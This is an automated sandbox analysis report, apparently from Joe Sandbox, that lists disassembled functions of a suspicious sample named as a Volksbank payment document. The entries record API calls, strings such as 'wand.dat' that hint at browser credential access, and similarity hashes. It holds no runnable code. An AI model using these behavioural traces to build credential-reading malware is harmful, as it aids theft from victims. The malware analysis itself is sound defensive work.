                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                                          • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                                          Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                                                                                                                                          • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                                          Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                                                                          • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                                          • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                                                                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                                          Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                                          • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                                          • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                                          Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                                          Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                                                          • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                                                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                                          Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1889144086-0
                                                                                                                                                                                                                                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                                          Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1661045500-0
                                                                                                                                                                                                                                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                                          Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                          • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                                          Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                                          • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                                          Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                                          • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1549203181-0
                                                                                                                                                                                                                                          • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                                                                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                                                          Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3550944819-0
                                                                                                                                                                                                                                          • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                                          Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$free
                                                                                                                                                                                                                                          • String ID: g4@
                                                                                                                                                                                                                                          • API String ID: 2888793982-2133833424
                                                                                                                                                                                                                                          • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                                          Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
